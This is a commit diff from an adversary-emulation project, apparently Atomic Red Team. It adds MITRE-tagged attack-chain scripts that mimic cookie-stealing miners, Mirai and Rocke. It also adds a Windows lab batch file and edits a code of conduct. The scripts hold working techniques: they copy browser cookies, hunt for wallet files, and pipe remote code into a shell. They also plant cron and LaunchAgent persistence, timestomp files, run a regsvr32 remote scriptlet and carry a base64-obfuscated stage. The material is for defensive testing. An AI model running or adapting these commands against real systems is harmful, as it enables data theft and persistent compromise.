<plist version="1.0">
<dict>
<key>ProgramArguments</key>
<array>
<string>/Users/Shared/xmrig2</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>Label</key>
<string>cookie-miner-payload-launchagent.plist</string>
</dict>
</plist>
ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh
+49
View File
@@ -0,0 +1,49 @@
#! /bin/bash
# Tactic: Discovery
# Technique: T1033 - System Owner/User Discovery
OUTPUT="$(id -un)"
# Tactic: Collection
# Technique: T1005 - Data from Local System
cd ~/Library/Cookies
grep -q "coinbase" "Cookies.binarycookies"
# Tactic: Collection
# Technique: T1074 - Data Staged
mkdir ${OUTPUT}
cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
# Tactic: Exfiltration
# Technique: T1002 - Data Compressed
zip -r interestingsafaricookies.zip ${OUTPUT}
# Tactic: Exfiltration
# Technique: T1048 - Exfiltration Over Alternative Protocol
# Simulate network connection for exfiltration
curl https://atomicredteam.io > /dev/null
curl --silent https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py | python - ``
# Tactic: Discovery
# Technique: T1083 - File and Directory Discovery
find ~ -name "*wallet*" > interestingfiles.txt
cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
# Tactic: Persistence
# Technique: T1159 - Launch Agent
mkdir -p ~/Library/LaunchAgents
cd ~/Library/LaunchAgents
curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
curl --silent -o com.proxy.initialize.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
launchctl load -w com.apple.rig2.plist
launchctl load -w com.proxy.initialize.plist
cd /Users/Shared
curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x ./xmrig2
./xmrig2
ARTifacts/Chain_Reactions/cookie-miner-stage-02.py
+25
View File
@@ -0,0 +1,25 @@
# import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
# ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
# out = ps.stdout.read()
# ps.stdout.close()
# if re.search("Little Snitch", out):
# sys.exit()
# import urllib2;
# UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://atomicredteam.io';t='/news.php';req=urllib2.Request(server+t);
# req.add_header('User-Agent',UA);
# req.add_header('Cookie',"session=BmHiW7UA/sf9C279oE2owK9LZ0c=");
# proxy = urllib2.ProxyHandler();
# o = urllib2.build_opener(proxy);
# urllib2.install_opener(o);
# a=urllib2.urlopen(req).read();
# Tactic: Defense Evasion
# Technique: T1140 - Deobfuscate/Decode Files or Information
#
# Tactic: Discovery
# Technique: T1057 - Process Discovery
#
# Tactic: Command and Control
# Technique: T1043 - Commonly Used Port
#
import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'))
ARTifacts/Chain_Reactions/mirai-reaction-stage-01.sh
Executable
+17
View File
@@ -0,0 +1,17 @@
#! /bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
# Tactic: Discovery
# Technique: T1082 - System Information discovery
MIRAI_EXT=`uname -m`
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x mirai.$MIRAI_EXT
./mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf mirai.$MIRAI_EXT
ARTifacts/Chain_Reactions/rocke-and-roll-stage-01.sh
+10
View File
@@ -0,0 +1,10 @@
#! /bin/bash
# Tactic: Defense Evasion
# Technique: T1027 - Obfuscated Files or Information
bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh)|base64 -d |/bin/bash"
# If you want to skip the base64 process, uncommend the following line:
# bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|/bin/bash"
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 01" >> /tmp/atomic.log
ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh
+81
View File
@@ -0,0 +1,81 @@
IyEgL2Jpbi9iYXNoCgpmdW5jdGlvbiBjKCkgewpwa2lsbCAtZiBzb3VycGx1bQpwa2lsbCAtZiB4
bXJpZwpwa2lsbCAtZiBjcnlwdG9uaWdodApwa2lsbCAtZiBzdHJhdHVtCnBraWxsIC1mIG1peG5l
cmR4CnBraWxsIC1mIG1pbmV4bXIKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpw
a2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYgWGJhc2gKCiMgICBUYWN0aWM6IERlZmVuc2UgRXZh
c2lvbgojICAgVGVjaG5pcXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24K
Y2hhdHRyIC1pIC90bXAva3dvcmtlcmRzIC92YXIvdG1wL2t3b3JrZXJkcwoKIyAgIFRhY3RpYzog
RGVmZW5zZSBFdmFzaW9uCiMgICBUZWNobmlxdWU6IFQxMTA3IC0gRmlsZSBEZWxldGlvbgpybSAt
cmYgL3RtcC9rd29ya2VyZHMgL3Zhci90bXAva3dvcmtlcmRzCgojICAgVGFjdGljOiBEaXNjb3Zl
cnkKIyAgIFRlY2huaXF1ZTogVDEwNTcgLSBQcm9jZXNzIERpc2NvdmVyeQpwcyBhdXhmfGdyZXAg
LXYgZ3JlcHxncmVwIC12ICJcXyIgfGdyZXAgLXYgImt0aHJlYWRkIiB8Z3JlcCAiXFsuKlxdInxh
d2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCnBzIGF1eGZ8Z3Jl
cCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+
L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiWGJhc2giIHwgYXdrICd7
cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpwcyBhdXhmfGdyZXAgLXYg
Z3JlcHxncmVwICJzdHJhdHVtIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rl
di9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yIiB8IGF3ayAne3ByaW50
ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8
Z3JlcCAibWluZXJkIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKCiMgICBUYWN0aWM6IERpc2NvdmVyeQojICAgVGVjaG5pcXVlOiBUMTA0OSAtIFN5c3Rl
bSBOZXR3b3JrIENvbm5lY3Rpb25zIERpc2NvdmVyeQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzMz
IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxs
IC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo0NDQ0IHxhd2sgJ3twcmlu
dCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251
bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo1NTU1IHxhd2sgJ3twcmludCAkN30nfCBhd2sg
LUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRz
dGF0IC1hbnAgfCBncmVwIDo2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3By
aW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBn
cmVwIDo3Nzc3IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4
YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzQ3IHxh
d2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05
ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDoxNDQ0NCB8YXdrICd7cHJpbnQg
JDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKbmV0c3RhdCAtYW5wIHwgZ3JlcCA6MTQ0MzMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAt
RidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCgplY2hv
ICQoZGF0ZSAtdSkgIkV4ZWN1dGVkIEF0b21pYyBSZWQgVGVhbSBSb2NrZSBhbmQgUm9sbCwgU3Rh
Z2UgMDIsIHBhcnQgQyIgPj4gL3RtcC9hdG9taWMubG9nCn0KCmZ1bmN0aW9uIGIoKSB7CiAgICBt
a2RpciAtcCAvdmFyL3RtcAoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAgIyAg
IFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCiAgICBjaG1v
ZCAxNzc3IC92YXIvdG1wCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAg
VGVjaG5pcXVlOiBUMTAzNiAtIE1hc3F1ZXJhZGluZwogICAgKGN1cmwgLWZzU0wgLS1jb25uZWN0
LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnlj
by9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvYXRvbWlj
LWhlbGxvIC1vIC92YXIvdG1wL2t3b3JrZXJkc3x8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2Vy
Y29udGVudC5jb20vcmVkY2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMv
Q2hhaW5fUmVhY3Rpb25zL2F0b21pYy1oZWxsbyAtTyAvdmFyL3RtcC9rd29ya2VyZHMpICYmIGNo
bW9kICt4IC92YXIvdG1wL2t3b3JrZXJkcwogICAgbm9odXAgL3Zhci90bXAva3dvcmtlcmRzID4v
ZGV2L251bGwgMj4mMSAmCgogICAgZWNobyAkKGRhdGUgLXUpICJFeGVjdXRlZCBBdG9taWMgUmVk
IFRlYW0gUm9ja2UgYW5kIFJvbGwsIFN0YWdlIDAyLCBwYXJ0IEIiID4+IC90bXAvYXRvbWljLmxv
Zwp9CgpmdW5jdGlvbiBhKCkgewoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAg
IyAgIFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCgljaGF0
dHIgLWkgL2V0Yy9jcm9uLmQvcm9vdCAvdmFyL3Nwb29sL2Nyb24vcm9vdCAvdmFyL3Nwb29sL2Ny
b24vY3JvbnRhYnMvcm9vdAoKICAgICMgICBUYWN0aWM6IFBlcnNpc3RlbmNlCiAgICAjICAgVGVj
aG5pcXVlOiBUMTE2OCAtIExvY2FsIEpvYiBTY2hlZHVsaW5nCgllY2hvIC1lICIqLzEwICogKiAq
ICogcm9vdCAoY3VybCAtZnNTTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2h8fHdnZXQgLXEgLU8tIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaCl8c2hcbiMjIiA+IC9ldGMvY3Jvbi5kL3Jvb3QKCW1rZGlyIC1wIC92YXIvc3Bvb2wv
Y3Jvbi9jcm9udGFicwoJZWNobyAtZSAiKi8zMSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Jl
ZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9tYXN0ZXIvQVJUaWZhY3RzL0NoYWluX1JlYWN0aW9u
cy9yb2NrZS1hbmQtcm9sbC1zdGFnZS0wMi1kZWNvZGVkLnNoKXxzaFxuIyMiID4gL3Zhci9zcG9v
bC9jcm9uL2Nyb250YWJzL3Jvb3QKCW1rZGlyIC1wIC9ldGMvY3Jvbi5kYWlseQoJKGN1cmwgLWZz
U0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNv
bS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFj
dGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVjb2RlZC5zaCAtbyAvZXRjL2Nyb24uZGFp
bHkvb2FuYWNyb25lcnx8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2ggLU8gL2V0Yy9jcm9uLmRhaWx5L29h
bmFjcm9uZXIpCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAgVGVjaG5p
cXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24KICAgIGNobW9kIDc1NSAv
ZXRjL2Nyb24uZGFpbHkvb2FuYWNyb25lcgoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lv
bgogICAgIyAgIFRlY2huaXF1ZTogVDEwOTkgLSBUaW1lc3RvbXAKCXRvdWNoIC1hY21yIC9iaW4v
c2ggL2V0Yy9jcm9uLmRhaWx5L29hbmFjcm9uZXIKICAgIHRvdWNoIC1hY21yIC9iaW4vc2ggL2V0
Yy9jcm9uLmQvcm9vdAogICAgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdmFyL3Nwb29sL2Nyb24vY3Jv
bnRhYnMvcm9vdAoKICAgIGVjaG8gJChkYXRlIC11KSAiRXhlY3V0ZWQgQXRvbWljIFJlZCBUZWFt
IFJvY2tlIGFuZCBSb2xsLCBTdGFnZSAwMiwgcGFydCBBIiA+PiAvdG1wL2F0b21pYy5sb2cKfQoK
YQpiCmM=
ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh
+90
View File
@@ -0,0 +1,90 @@
#! /bin/bash
function c() {
pkill -f sourplum
pkill -f xmrig
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f minexmr
pkill -f minerd
pkill -f minergate
pkill -f kworker34
pkill -f Xbash
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Discovery
# Technique: T1057 - Process Discovery
ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
# Tactic: Discovery
# Technique: T1049 - System Network Connections Discovery
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part C" >> /tmp/atomic.log
}
function b() {
mkdir -p /var/tmp
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 1777 /var/tmp
# Tactic: Defense Evasion
# Technique: T1036 - Masquerading
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -o /var/tmp/kworkerds||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
nohup /var/tmp/kworkerds >/dev/null 2>&1 &
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part B" >> /tmp/atomic.log
}
function a() {
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root
# Tactic: Persistence
# Technique: T1168 - Local Job Scheduling
echo -e "*/10 * * * * root (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /etc/cron.d/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/31 * * * * (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.daily
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -o /etc/cron.daily/oanacroner||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -O /etc/cron.daily/oanacroner)
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 755 /etc/cron.daily/oanacroner
# Tactic: Defense Evasion
# Technique: T1099 - Timestomp
touch -acmr /bin/sh /etc/cron.daily/oanacroner
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part A" >> /tmp/atomic.log
}
a
b
c
ARTifacts/Labs/Webinar11062017-Labs.bat
+36
View File
@@ -0,0 +1,36 @@
:: Basic Test Lab One
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct
::
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: Lab Two
:: Chain Reactions - Chaining Multiple ATOMIC Test
:: Lets have some fun shall we ;-)
:: Techniques rarely occur in isolation
:: In the Attack Lets combine 3 Techniques
:: You can customize tests
:: Step 1. A payload executes Regsvr32.exe as seen in Lab One T1117
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: Step 2. This payload will execute an discovery sequence T1087
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser
:: Step 3. We will setup some persistence by creating a scheduled task. T1053
:: Alternate Ending : SCHTASKS /Create /SC ONCE /TN spawn /TR "regsvr32.exe /s /u /i:https://example.com/a.sct scrobj.dll" /ST 20:10
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
:: We will also just go ahead and clean up the task.
SCHTASKS /Delete /TN Spawn /F
atomics/T1074.001/src/Discovery.bat → ARTifacts/Misc/Discovery.bat
+5 -5
View File
@@ -8,16 +8,16 @@ net config workstation
net accounts
net accounts /domain
net view
sc.exe query
sc query
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
ARTifacts/Misc/flag.txt
+1
View File
@@ -0,0 +1 @@
Downloaded Remote Content
CODE_OF_CONDUCT.md
+22 -38
View File
@@ -1,58 +1,42 @@
# Contributor Code of Conduct
# Contributor Covenant Code of Conduct
Welcome to the [Atomic Red Team online community](https://atomicredteam.io/). Our goal is to foster an open, safe, and welcoming environment. As a collective, we—as contributors, maintainers, and the Open Source Projects team of Red Canary—pledge to encourage our project and community to be a harassment-free space. We invite you to collaborate, exchange thoughts or information, and engage with one another. Atomic Red Team is meant for everyone, regardless of age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation.
## Our Pledge
## Our Guidelines
In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
### Acceptable Behavior
## Our Standards
* Using welcoming and inclusive language. Some people [use different pronouns](https://www.npr.org/2021/06/02/996319297/gender-identity-pronouns-expression-guide-lgbtq)— please respect all pronouns.
Examples of behavior that contributes to creating a positive environment include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community and what supports engagement
* Showing compassion and understanding towards other community members
* Focusing on what is best for the community
* Showing empathy towards other community members
### Unacceptable Behavior
Examples of unacceptable behavior by participants include:
